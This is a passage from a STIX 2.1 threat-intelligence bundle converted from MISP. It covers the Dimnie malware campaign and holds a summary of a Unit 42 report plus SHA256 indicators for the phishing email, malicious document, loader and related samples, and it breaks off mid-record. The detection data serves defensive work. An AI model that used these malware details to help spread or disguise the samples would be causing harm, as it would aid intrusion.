"indicator--58db822e-a610-4c2b-a0c2-4e7202de0b81",
|
|
"indicator--58db822f-c654-42d6-aff5-421002de0b81",
|
|
"observed-data--58db8230-de8c-44cf-a841-4fed02de0b81",
|
|
"url--58db8230-de8c-44cf-a841-4fed02de0b81",
|
|
"indicator--58db8231-9070-4206-95ba-434702de0b81",
|
|
"indicator--58db8232-6494-4d7a-8683-4c8102de0b81",
|
|
"observed-data--58db8232-e5e8-4fd1-ba8b-47d602de0b81",
|
|
"url--58db8232-e5e8-4fd1-ba8b-47d602de0b81",
|
|
"indicator--58db8234-a8a0-49eb-9b81-494602de0b81",
|
|
"indicator--58db8235-298c-4041-80c0-439e02de0b81",
|
|
"observed-data--58db8236-375c-4a06-abe9-42fc02de0b81",
|
|
"url--58db8236-375c-4a06-abe9-42fc02de0b81",
|
|
"indicator--58db8237-ef4c-43fc-bf61-411002de0b81",
|
|
"indicator--58db8237-bb20-48dd-aa10-46ca02de0b81",
|
|
"observed-data--58db8238-2c2c-4f19-85e6-406d02de0b81",
|
|
"url--58db8238-2c2c-4f19-85e6-406d02de0b81",
|
|
"indicator--58db8239-19a0-4d4b-b45f-4cc302de0b81",
|
|
"indicator--58db823a-22cc-4573-8559-4fb502de0b81",
|
|
"observed-data--58db823b-b57c-4523-8732-45a402de0b81",
|
|
"url--58db823b-b57c-4523-8732-45a402de0b81",
|
|
"indicator--58db823c-3878-466e-a6aa-4bd202de0b81",
|
|
"indicator--58db823d-8f00-4406-84fe-465f02de0b81",
|
|
"observed-data--58db823e-ca18-4587-87cb-4a1b02de0b81",
|
|
"url--58db823e-ca18-4587-87cb-4a1b02de0b81",
|
|
"indicator--58db823f-d230-4e13-a93c-4ce902de0b81",
|
|
"indicator--58db8240-cc88-4723-a989-417c02de0b81",
|
|
"observed-data--58db8241-e914-4b3c-b833-49aa02de0b81",
|
|
"url--58db8241-e914-4b3c-b833-49aa02de0b81",
|
|
"indicator--58db8242-22dc-4440-b347-4d2b02de0b81",
|
|
"indicator--58db8243-a6d0-45fe-9142-4b6a02de0b81",
|
|
"observed-data--58db8244-8468-4cb6-8c2c-4d6502de0b81",
|
|
"url--58db8244-8468-4cb6-8c2c-4d6502de0b81",
|
|
"indicator--58db8245-e090-4598-bc65-46b402de0b81",
|
|
"indicator--58db8245-a934-41ad-9a17-481302de0b81",
|
|
"observed-data--58db8246-4348-4d0c-b493-40c602de0b81",
|
|
"url--58db8246-4348-4d0c-b493-40c602de0b81",
|
|
"indicator--58db8247-be08-4c51-9da2-480f02de0b81",
|
|
"indicator--58db8248-d05c-4dfc-a636-4f4f02de0b81",
|
|
"observed-data--58db8249-fb4c-45f7-ad96-4ca802de0b81",
|
|
"url--58db8249-fb4c-45f7-ad96-4ca802de0b81",
|
|
"indicator--58db824a-72c0-44fc-bfff-420d02de0b81",
|
|
"indicator--58db824b-b5bc-47b2-89a2-42f302de0b81",
|
|
"observed-data--58db824c-69c8-4eb5-8d88-401b02de0b81",
|
|
"url--58db824c-69c8-4eb5-8d88-401b02de0b81",
|
|
"indicator--58db824d-ebb0-4bef-9a4d-4bfd02de0b81",
|
|
"indicator--58db824e-d4e0-47f9-bc41-44c302de0b81",
|
|
"observed-data--58db824f-c200-43ac-8056-4ac502de0b81",
|
|
"url--58db824f-c200-43ac-8056-4ac502de0b81",
|
|
"indicator--58db8250-4a5c-4d48-a72f-433c02de0b81",
|
|
"indicator--58db8251-682c-4f67-ab34-43da02de0b81",
|
|
"observed-data--58db8251-f478-4a9d-9663-44bb02de0b81",
|
|
"url--58db8251-f478-4a9d-9663-44bb02de0b81",
|
|
"indicator--58db8252-c64c-4173-845a-438402de0b81",
|
|
"indicator--58db8253-2b20-4de8-b4f8-43a302de0b81",
|
|
"observed-data--58db8254-fd5c-491e-bbdb-48d502de0b81",
|
|
"url--58db8254-fd5c-491e-bbdb-48d502de0b81",
|
|
"indicator--58db8255-5328-42dd-a81d-470e02de0b81",
|
|
"indicator--58db8256-9078-417c-82c6-4fdd02de0b81",
|
|
"observed-data--58db8257-1428-4708-ad2e-46dc02de0b81",
|
|
"url--58db8257-1428-4708-ad2e-46dc02de0b81",
|
|
"indicator--58db8258-cfac-4b6a-8c3f-40a202de0b81",
|
|
"indicator--58db8259-e5bc-4150-bced-4f4202de0b81",
|
|
"observed-data--58db825a-8540-4a14-b9f1-4b2202de0b81",
|
|
"url--58db825a-8540-4a14-b9f1-4b2202de0b81",
|
|
"indicator--58db825b-5b40-4a39-8bad-4b8902de0b81",
|
|
"indicator--58db825c-1b1c-40d8-825f-415a02de0b81",
|
|
"observed-data--58db825d-26f0-4889-86fd-473402de0b81",
|
|
"url--58db825d-26f0-4889-86fd-473402de0b81",
|
|
"indicator--58db825e-465c-46c7-aec4-44d202de0b81",
|
|
"indicator--58db825f-66bc-4b59-98d2-4b2a02de0b81",
|
|
"observed-data--58db8260-54dc-4d61-b3c5-46ad02de0b81",
|
|
"url--58db8260-54dc-4d61-b3c5-46ad02de0b81",
|
|
"indicator--58db8261-b8d0-4de2-8d90-487502de0b81",
|
|
"indicator--58db8261-5d2c-491d-ae04-4f8d02de0b81",
|
|
"observed-data--58db8263-3888-4482-9949-46e402de0b81",
|
|
"url--58db8263-3888-4482-9949-46e402de0b81",
|
|
"indicator--58db8263-4034-4ef3-a7a2-48f202de0b81",
|
|
"indicator--58db8264-1198-4a26-8142-46b202de0b81",
|
|
"observed-data--58db8265-c5dc-48ec-afe1-491102de0b81",
|
|
"url--58db8265-c5dc-48ec-afe1-491102de0b81",
|
|
"indicator--58db8266-7d30-42f9-a3af-4a9d02de0b81",
|
|
"indicator--58db8267-4200-476e-8d02-4dde02de0b81",
|
|
"observed-data--58db8268-34b8-4d45-91a1-415702de0b81",
|
|
"url--58db8268-34b8-4d45-91a1-415702de0b81",
|
|
"indicator--58db8269-18c4-4818-bd0e-433902de0b81",
|
|
"indicator--58db826a-b200-44b2-8466-468902de0b81",
|
|
"observed-data--58db826b-2358-44f9-b008-41aa02de0b81",
|
|
"url--58db826b-2358-44f9-b008-41aa02de0b81",
|
|
"indicator--58db826c-424c-4cf5-b6e8-416a02de0b81",
|
|
"indicator--58db826d-bcc8-4126-83c8-412f02de0b81",
|
|
"observed-data--58db826e-f094-4e9c-9ac5-4e5802de0b81",
|
|
"url--58db826e-f094-4e9c-9ac5-4e5802de0b81",
|
|
"indicator--58db826f-e698-490e-b4de-477b02de0b81",
|
|
"indicator--58db8270-0d10-4953-ae4b-423502de0b81",
|
|
"observed-data--58db8271-bc84-45a8-9fc2-42b002de0b81",
|
|
"url--58db8271-bc84-45a8-9fc2-42b002de0b81",
|
|
"indicator--58db8272-ea08-494c-bc96-443302de0b81",
|
|
"indicator--58db8272-9220-4217-ac8b-402e02de0b81",
|
|
"observed-data--58db8273-86dc-43e0-af7a-4d1102de0b81",
|
|
"url--58db8273-86dc-43e0-af7a-4d1102de0b81",
|
|
"indicator--58db8274-dc3c-441b-89de-453602de0b81",
|
|
"indicator--58db8275-a7b4-40f6-9a6d-426a02de0b81",
|
|
"observed-data--58db8276-5690-4807-82e0-455d02de0b81",
|
|
"url--58db8276-5690-4807-82e0-455d02de0b81",
|
|
"indicator--58db8277-deec-4344-acf3-4e7702de0b81",
|
|
"indicator--58db8278-6894-4b8f-92a5-46e502de0b81",
|
|
"observed-data--58db8279-1128-4ce1-9708-418f02de0b81",
|
|
"url--58db8279-1128-4ce1-9708-418f02de0b81",
|
|
"indicator--58db827a-4860-4086-9c04-4f4702de0b81",
|
|
"indicator--58db827b-048c-441f-9dbe-44cc02de0b81",
|
|
"observed-data--58db827c-ee3c-4d28-b530-4b4a02de0b81",
|
|
"url--58db827c-ee3c-4d28-b530-4b4a02de0b81",
|
|
"indicator--58db827c-bb2c-4b67-aca8-422802de0b81",
|
|
"indicator--58db827d-31ec-4f8a-8d9a-407202de0b81",
|
|
"observed-data--58db827e-7528-426e-8d6c-432802de0b81",
|
|
"url--58db827e-7528-426e-8d6c-432802de0b81",
|
|
"indicator--58db827f-d314-4138-889d-417902de0b81",
|
|
"indicator--58db8280-33e0-4728-a21a-45b602de0b81",
|
|
"observed-data--58db8281-6054-4cb9-8efd-446902de0b81",
|
|
"url--58db8281-6054-4cb9-8efd-446902de0b81",
|
|
"indicator--58db8282-8d10-4637-af09-4cb702de0b81",
|
|
"indicator--58db8283-8280-4c78-b4f8-46a002de0b81",
|
|
"observed-data--58db8284-60a0-4318-b08f-47f502de0b81",
|
|
"url--58db8284-60a0-4318-b08f-47f502de0b81",
|
|
"indicator--58db8285-2a70-40a5-b4a3-4d8f02de0b81",
|
|
"indicator--58db8286-b2cc-45d6-b77f-4b3102de0b81",
|
|
"observed-data--58db8287-6950-4a24-aab0-4c4c02de0b81",
|
|
"url--58db8287-6950-4a24-aab0-4c4c02de0b81",
|
|
"indicator--58db8288-93b0-46a5-a2ec-402a02de0b81",
|
|
"indicator--58db8289-d6a8-4330-b291-4c5102de0b81",
|
|
"observed-data--58db828a-9818-4d3c-96fe-48c902de0b81",
|
|
"url--58db828a-9818-4d3c-96fe-48c902de0b81",
|
|
"indicator--58db828b-83f4-478b-aa89-42f302de0b81",
|
|
"indicator--58db828c-91d0-4ff9-b139-465c02de0b81",
|
|
"observed-data--58db828d-1dbc-4d14-a3e7-487902de0b81",
|
|
"url--58db828d-1dbc-4d14-a3e7-487902de0b81",
|
|
"indicator--58db828d-cfc8-49c6-8983-48b202de0b81",
|
|
"indicator--58db828e-34e8-4c4c-8ce0-4a5202de0b81",
|
|
"observed-data--58db828f-c9c4-47cd-a241-45c802de0b81",
|
|
"url--58db828f-c9c4-47cd-a241-45c802de0b81",
|
|
"indicator--58db8290-f61c-44f2-92fe-4f8a02de0b81",
|
|
"indicator--58db8291-c714-47da-88f3-46df02de0b81",
|
|
"observed-data--58db8292-010c-43a1-b3a8-4c0d02de0b81",
|
|
"url--58db8292-010c-43a1-b3a8-4c0d02de0b81",
|
|
"indicator--58db8293-8378-4a15-bbcf-467c02de0b81",
|
|
"indicator--58db8294-8d68-4b1e-96be-4f2302de0b81",
|
|
"observed-data--58db8295-bc6c-436b-b5eb-4a6c02de0b81",
|
|
"url--58db8295-bc6c-436b-b5eb-4a6c02de0b81",
|
|
"indicator--58db8296-28f8-4c12-813c-455102de0b81",
|
|
"indicator--58db8297-e090-40de-a40e-4f7b02de0b81",
|
|
"observed-data--58db8298-4e80-405c-bf05-4eb602de0b81",
|
|
"url--58db8298-4e80-405c-bf05-4eb602de0b81",
|
|
"indicator--58db8299-2994-4a18-a285-4eae02de0b81",
|
|
"indicator--58db8299-fc10-423f-a91f-4af502de0b81",
|
|
"observed-data--58db829a-9108-4e3b-963e-424b02de0b81",
|
|
"url--58db829a-9108-4e3b-963e-424b02de0b81",
|
|
"indicator--58db829b-8190-404b-b889-414f02de0b81",
|
|
"indicator--58db829c-8644-4a5c-8ebc-476502de0b81",
|
|
"observed-data--58db829d-4868-4565-aa57-4dc302de0b81",
|
|
"url--58db829d-4868-4565-aa57-4dc302de0b81",
|
|
"indicator--58db829e-ff18-4a49-8fda-437902de0b81",
|
|
"indicator--58db829f-1570-4b80-b8dc-493102de0b81",
|
|
"observed-data--58db82a0-fa6c-47ce-af37-4a2102de0b81",
|
|
"url--58db82a0-fa6c-47ce-af37-4a2102de0b81",
|
|
"indicator--58db82a1-bdf4-4c98-9fd0-4ffd02de0b81",
|
|
"indicator--58db82a2-e428-4b09-b584-4f8702de0b81",
|
|
"observed-data--58db82a3-3618-4f6e-8e36-4f7002de0b81",
|
|
"url--58db82a3-3618-4f6e-8e36-4f7002de0b81",
|
|
"indicator--58db82a4-b0c8-4e79-b971-4db102de0b81",
|
|
"indicator--58db82a4-d3dc-4ea1-afa6-40ae02de0b81",
|
|
"observed-data--58db82a5-7ea0-4232-9946-44a402de0b81",
|
|
"url--58db82a5-7ea0-4232-9946-44a402de0b81",
|
|
"indicator--58db82a6-46cc-468d-96a6-45ec02de0b81",
|
|
"indicator--58db82a7-ea80-4efd-b295-47d002de0b81",
|
|
"observed-data--58db82a8-3c70-437b-b559-45b502de0b81",
|
|
"url--58db82a8-3c70-437b-b559-45b502de0b81",
|
|
"indicator--58db82a9-04b0-4007-a19e-4a2c02de0b81",
|
|
"indicator--58db82aa-a578-4b11-8ee8-424802de0b81",
|
|
"observed-data--58db82ab-b44c-4828-bb18-449202de0b81",
|
|
"url--58db82ab-b44c-4828-bb18-449202de0b81",
|
|
"indicator--58db82ac-2820-4d74-9756-492b02de0b81",
|
|
"indicator--58db82ad-2e68-4614-bcdb-47d802de0b81",
|
|
"observed-data--58db82ad-95d0-42c1-b577-4de302de0b81",
|
|
"url--58db82ad-95d0-42c1-b577-4de302de0b81",
|
|
"indicator--58db82ae-7458-4cdc-a97a-440002de0b81",
|
|
"indicator--58db82af-7368-484f-8403-4fd002de0b81",
|
|
"observed-data--58db82b0-2b38-428d-8417-447a02de0b81",
|
|
"url--58db82b0-2b38-428d-8417-447a02de0b81",
|
|
"indicator--58db82b1-9048-4e04-84c1-428102de0b81",
|
|
"indicator--58db82b2-c638-452b-96a4-43bd02de0b81",
|
|
"observed-data--58db82b3-dcd4-44ae-bdac-48ca02de0b81",
|
|
"url--58db82b3-dcd4-44ae-bdac-48ca02de0b81",
|
|
"indicator--58db82b4-5b00-40c8-b5a8-443c02de0b81",
|
|
"indicator--58db82b5-45a8-4734-ac34-4bb602de0b81",
|
|
"observed-data--58db82b5-a164-4060-92f3-456f02de0b81",
|
|
"url--58db82b5-a164-4060-92f3-456f02de0b81",
|
|
"indicator--58db82b6-8060-4ca3-9c11-4a3d02de0b81",
|
|
"indicator--58db82b7-3c44-4404-a616-432b02de0b81",
|
|
"observed-data--58db82b8-c338-40c1-855d-4b8e02de0b81",
|
|
"url--58db82b8-c338-40c1-855d-4b8e02de0b81",
|
|
"indicator--58db82b9-074c-4ed6-9f5a-431d02de0b81",
|
|
"indicator--58db82ba-3c8c-4cf1-9f56-4e5002de0b81",
|
|
"observed-data--58db82bb-88c0-437a-b179-4fff02de0b81",
|
|
"url--58db82bb-88c0-437a-b179-4fff02de0b81",
|
|
"indicator--58db82bc-c7c8-43be-92a8-4a0402de0b81",
|
|
"indicator--58db82bd-1624-4c1d-a1fc-41c202de0b81",
|
|
"observed-data--58db82be-e58c-4bc9-8f93-4eba02de0b81",
|
|
"url--58db82be-e58c-4bc9-8f93-4eba02de0b81",
|
|
"indicator--58db82be-3c20-4e00-abdb-453402de0b81",
|
|
"indicator--58db82bf-c180-40cf-82ae-477a02de0b81",
|
|
"observed-data--58db82c0-b80c-4d26-b228-48ec02de0b81",
|
|
"url--58db82c0-b80c-4d26-b228-48ec02de0b81",
|
|
"indicator--58db82c1-b12c-41bf-82ea-4df802de0b81",
|
|
"indicator--58db82c2-e960-4b9d-ab3e-4f0f02de0b81",
|
|
"observed-data--58db82c3-d08c-4d0e-8184-4cb202de0b81",
|
|
"url--58db82c3-d08c-4d0e-8184-4cb202de0b81",
|
|
"indicator--58db82c4-32b4-447b-92f0-422002de0b81",
|
|
"indicator--58db82c5-437c-4c56-8f05-427c02de0b81",
|
|
"observed-data--58db82c6-c07c-4b2c-bc55-4a7202de0b81",
|
|
"url--58db82c6-c07c-4b2c-bc55-4a7202de0b81",
|
|
"indicator--58db82c6-a2a8-416a-b804-4c1c02de0b81",
|
|
"indicator--58db82c7-d258-482b-bfdd-445f02de0b81",
|
|
"observed-data--58db82c8-8e04-41fd-a2c2-4d8102de0b81",
|
|
"url--58db82c8-8e04-41fd-a2c2-4d8102de0b81",
|
|
"indicator--58db82c9-a054-4b25-96ad-4e7602de0b81",
|
|
"indicator--58db82ca-038c-4db0-80b4-4c1d02de0b81",
|
|
"observed-data--58db82cb-8bc4-4ff1-aad5-452202de0b81",
|
|
"url--58db82cb-8bc4-4ff1-aad5-452202de0b81",
|
|
"indicator--58db82cc-efe8-4937-9a2f-49b802de0b81",
|
|
"indicator--58db82cd-0ac8-4395-87d9-488102de0b81",
|
|
"observed-data--58db82ce-b4f0-4d26-9f88-430b02de0b81",
|
|
"url--58db82ce-b4f0-4d26-9f88-430b02de0b81",
|
|
"indicator--58db82ce-08cc-40da-9f53-4fcd02de0b81",
|
|
"indicator--58db82cf-71bc-4424-bba5-42aa02de0b81",
|
|
"observed-data--58db82d0-dcb0-4e9d-90fb-43b602de0b81",
|
|
"url--58db82d0-dcb0-4e9d-90fb-43b602de0b81",
|
|
"indicator--58db82d1-ba44-4fdc-af31-4c2002de0b81",
|
|
"indicator--58db82d2-a644-422a-bf0a-404602de0b81",
|
|
"observed-data--58db82d3-afd8-4c2a-98ef-458702de0b81",
|
|
"url--58db82d3-afd8-4c2a-98ef-458702de0b81",
|
|
"indicator--58db82d4-1f98-40f0-b430-4ec802de0b81",
|
|
"indicator--58db82d5-56e8-49aa-9ac0-444c02de0b81",
|
|
"observed-data--58db82d6-f670-4ba6-bb0e-47e702de0b81",
|
|
"url--58db82d6-f670-4ba6-bb0e-47e702de0b81",
|
|
"indicator--58db82d6-75e4-41ac-8dcf-4bd502de0b81",
|
|
"indicator--58db82d7-479c-41cd-a4cd-4d8b02de0b81",
|
|
"observed-data--58db82d8-0aa0-4f68-88ee-45d602de0b81",
|
|
"url--58db82d8-0aa0-4f68-88ee-45d602de0b81",
|
|
"indicator--58db82d9-b344-4870-91cd-4f6102de0b81",
|
|
"indicator--58db82da-e578-4c19-a319-49e102de0b81",
|
|
"observed-data--58db82db-3ab8-4fad-a0d3-452802de0b81",
|
|
"url--58db82db-3ab8-4fad-a0d3-452802de0b81",
|
|
"indicator--58db82dc-2ee4-40b7-bd4a-4e3b02de0b81",
|
|
"indicator--58db82dd-80ac-4d0b-a97d-4e0902de0b81",
|
|
"observed-data--58db82de-24d4-4174-b7bf-401502de0b81",
|
|
"url--58db82de-24d4-4174-b7bf-401502de0b81",
|
|
"indicator--58db82de-5e5c-4ad8-bc30-4b9002de0b81",
|
|
"indicator--58db82df-0804-40e0-afae-412202de0b81",
|
|
"observed-data--58db82e0-648c-41fa-b808-4c0602de0b81",
|
|
"url--58db82e0-648c-41fa-b808-4c0602de0b81",
|
|
"indicator--58db82e1-3884-4417-9a2a-4da602de0b81",
|
|
"indicator--58db82e2-2dac-4fa4-a207-431f02de0b81",
|
|
"observed-data--58db82e3-4da8-47b9-b9c9-471502de0b81",
|
|
"url--58db82e3-4da8-47b9-b9c9-471502de0b81",
|
|
"indicator--58db82e4-c6b4-4f2c-9d70-48f502de0b81",
|
|
"indicator--58db82e5-cd04-441a-b951-42dc02de0b81",
|
|
"observed-data--58db82e6-2cc8-4bea-a262-4df302de0b81",
|
|
"url--58db82e6-2cc8-4bea-a262-4df302de0b81",
|
|
"indicator--58db82e6-e584-45b0-b5c0-488a02de0b81",
|
|
"indicator--58db82e7-0e98-4e74-9729-440302de0b81",
|
|
"observed-data--58db82e8-cb54-4a71-8d37-437802de0b81",
|
|
"url--58db82e8-cb54-4a71-8d37-437802de0b81",
|
|
"indicator--58db82e9-aa34-4073-9eb0-48f702de0b81",
|
|
"indicator--58db82ea-0f78-4f33-9b73-456402de0b81",
|
|
"observed-data--58db82eb-1adc-4be8-a7e7-4a8002de0b81",
|
|
"url--58db82eb-1adc-4be8-a7e7-4a8002de0b81",
|
|
"indicator--58db82ec-59cc-44f4-aebd-48f802de0b81",
|
|
"indicator--58db82ed-9e84-4676-8235-471f02de0b81",
|
|
"observed-data--58db82ee-ee40-43d9-b128-47f502de0b81",
|
|
"url--58db82ee-ee40-43d9-b128-47f502de0b81",
|
|
"indicator--58db82ee-3c84-4cb4-9c55-4cb902de0b81",
|
|
"indicator--58db82ef-66e8-4a1a-b5e9-49d302de0b81",
|
|
"observed-data--58db82f0-637c-4fb1-9806-44a902de0b81",
|
|
"url--58db82f0-637c-4fb1-9806-44a902de0b81",
|
|
"indicator--58db82f1-6e0c-47b7-a61e-44ab02de0b81",
|
|
"indicator--58db82f2-0e20-4ec9-8b8c-4f8502de0b81",
|
|
"observed-data--58db82f3-f4e8-4f66-a17d-483d02de0b81",
|
|
"url--58db82f3-f4e8-4f66-a17d-483d02de0b81",
|
|
"indicator--58db82f4-4c68-486f-81df-48d202de0b81",
|
|
"indicator--58db82f5-e9b4-4649-adcc-44a602de0b81",
|
|
"observed-data--58db82f6-99d4-42d8-b248-4e7502de0b81",
|
|
"url--58db82f6-99d4-42d8-b248-4e7502de0b81",
|
|
"indicator--58db82f6-1054-4519-8499-428402de0b81",
|
|
"indicator--58db82f7-30fc-4a4a-9406-479a02de0b81",
|
|
"observed-data--58db82f8-21ec-4540-b684-46f502de0b81",
|
|
"url--58db82f8-21ec-4540-b684-46f502de0b81",
|
|
"indicator--58db82f9-2708-4f4f-a81e-406a02de0b81",
|
|
"indicator--58db82fa-7a68-4551-a035-4de402de0b81",
|
|
"observed-data--58db82fb-f1fc-449c-9354-402a02de0b81",
|
|
"url--58db82fb-f1fc-449c-9354-402a02de0b81",
|
|
"indicator--58db82fc-2810-43fa-831a-435e02de0b81",
|
|
"indicator--58db82fd-166c-4cb7-ab48-449302de0b81",
|
|
"observed-data--58db82fe-ada0-4e58-a871-4ee002de0b81",
|
|
"url--58db82fe-ada0-4e58-a871-4ee002de0b81",
|
|
"indicator--58db82fe-a0a8-43af-8d4a-4bdc02de0b81",
|
|
"indicator--58db82ff-62a4-49d8-9553-4ac302de0b81",
|
|
"observed-data--58db8300-5d18-4cff-8ad1-426302de0b81",
|
|
"url--58db8300-5d18-4cff-8ad1-426302de0b81",
|
|
"indicator--58db8301-028c-420d-b737-450202de0b81",
|
|
"indicator--58db8302-14e4-4651-bbaf-49d002de0b81",
|
|
"observed-data--58db8303-7c04-4385-9ed8-457302de0b81",
|
|
"url--58db8303-7c04-4385-9ed8-457302de0b81"
|
|
],
|
|
"labels": [
|
|
"Threat-Report",
|
|
"misp:tool=\"MISP-STIX-Converter\"",
|
|
"osint:source-type=\"blog-post\""
|
|
],
|
|
"object_marking_refs": [
|
|
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
|
|
]
|
|
},
|
|
{
|
|
"type": "x-misp-attribute",
|
|
"spec_version": "2.1",
|
|
"id": "x-misp-attribute--58db5edc-bcec-457a-94bf-4193950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"labels": [
|
|
"misp:type=\"text\"",
|
|
"misp:category=\"External analysis\""
|
|
],
|
|
"x_misp_category": "External analysis",
|
|
"x_misp_type": "text",
|
|
"x_misp_value": "The global reach of the January 2017 campaign which we analyzed in this post is a marked departure from previous Dimnie targeting tactics. Multiple factors have contributed to Dimnie\u00e2\u20ac\u2122s relatively long-lived existence. By masking upload and download network traffic as innocuous user activity, Dimnie has taken advantage of defenders\u00e2\u20ac\u2122 assumptions about what normal traffic looks like. This blending in tactic, combined with a prior penchant for targeting systems used by Russian speakers, likely allowed Dimnie to remain relatively unknown.\r\n\r\nCustomers are protected by IPS Signature 13568, Dimnie is detected as malware by Wildfire, and Autofocus customers can see related samples using the Dimnie tag.\r\n\r\nWe are also including IOCs for this malware family dating back to 2014 which include domains from DNS lookups (Appendix A) and dropper hashes (Appendix B). IOCs specifically mentioned in this post are included in the next section."
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db5ef2-1c88-4619-a463-4a93950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"first_observed": "2017-03-29T09:22:07Z",
|
|
"last_observed": "2017-03-29T09:22:07Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db5ef2-1c88-4619-a463-4a93950d210f"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db5ef2-1c88-4619-a463-4a93950d210f",
|
|
"value": "http://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db5f2c-1388-45e6-a06a-4b8e950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Initial Phishing Email",
|
|
"pattern": "[file:hashes.SHA256 = 'b70a17d21ec6552e884f01db47b4e0aa08776a6542883d144b9836d5c9912065']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db5f2d-22e4-496a-a8aa-42a5950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Malicious .doc file",
|
|
"pattern": "[file:hashes.SHA256 = '6b9af3290723f081e090cd29113c8755696dca88f06d072dd75bf5560ca9408e']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db5f2e-379c-4f62-a1c5-4391950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Dimnie loader",
|
|
"pattern": "[file:hashes.SHA256 = '3f73b09d9cdd100929061d8590ef0bc01b47999f47fa024f57c28dcd660e7c22']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db5f2f-5ee8-4072-a956-4b1d950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Sample decrypted main module",
|
|
"pattern": "[file:hashes.SHA256 = '6173d2f1d7bdea5f6fe199d39bbefa575230c5a6c52b08925ff4693106518adf']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db5fa7-1314-465d-85cb-4174950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated samples",
|
|
"pattern": "[file:hashes.SHA256 = '15895f99011f466f2ddfa8345478b2387762d98eecf2ada51ad7f70618406ba1']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db5fa8-c028-4da9-8b3a-4ac3950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated samples",
|
|
"pattern": "[file:hashes.SHA256 = '7d8ec31d9d98802e9b1ebc49c4b300fa901934b3d2d602fa36cc5d7c5d24b3bc']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
